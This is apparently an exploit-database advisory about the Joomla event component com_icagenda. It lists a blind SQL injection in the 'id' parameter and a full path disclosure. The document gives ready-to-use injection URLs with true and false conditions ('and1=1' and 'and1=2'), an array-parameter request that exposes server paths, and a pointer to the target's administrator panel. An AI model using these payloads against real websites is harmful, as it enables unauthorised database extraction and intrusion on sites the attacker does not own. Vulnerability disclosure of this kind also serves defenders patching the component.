# Souhail Hammou - Independant Security Researcher & Penetration Tester .# Facebook : www.facebook.com/dark.puzzle.sec# E-mail : dark-puzzle@live.fr# Greetings to all moroccan researchers and white hats .------------------------------------------------------------------------------# Exploit Title: Joomla Component (com_icagenda) Multiple Vulnerabilities . # Author: Dark-Puzzle (Souhail Hammou)# Risk : Critical# Version: All Versions# Google Dork : N/A# Category: Webapps# Tested on: Windows Xp Sp2 Fr .# OSVDB ID : 85147 and 85148 .# OSVDB Links : http://osvdb.org/show/osvdb/85148 & http://osvdb.org/show/osvdb/85147***************************************************************************************
Info :
Icagenda is a New Component for Event Management with a calendar module.----------------------------------------------------
I - Blind SQL Injection Vulnerability
----------------------------------------------------
Vulnerability :"id" parameter in com_icagenda is prone to a Blind SQL Vulnerability . An attacker can retrieve & steal data by sending series of TrueandFalse Queries through SQL statements .
Here the invisible content shows us that the target suffers from Blind SQL Injection Vulnerability .
Example :
server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1and1=1(True)
server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1and1=2(False)
ADMIN PANEL : http://target/administrator
-----------------------------------------------------
II - Full Path Disclosure Vulnerability
-----------------------------------------------------
The Full path can be retrieved using Array method []in ItemID &id Parameters .
Example :
http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
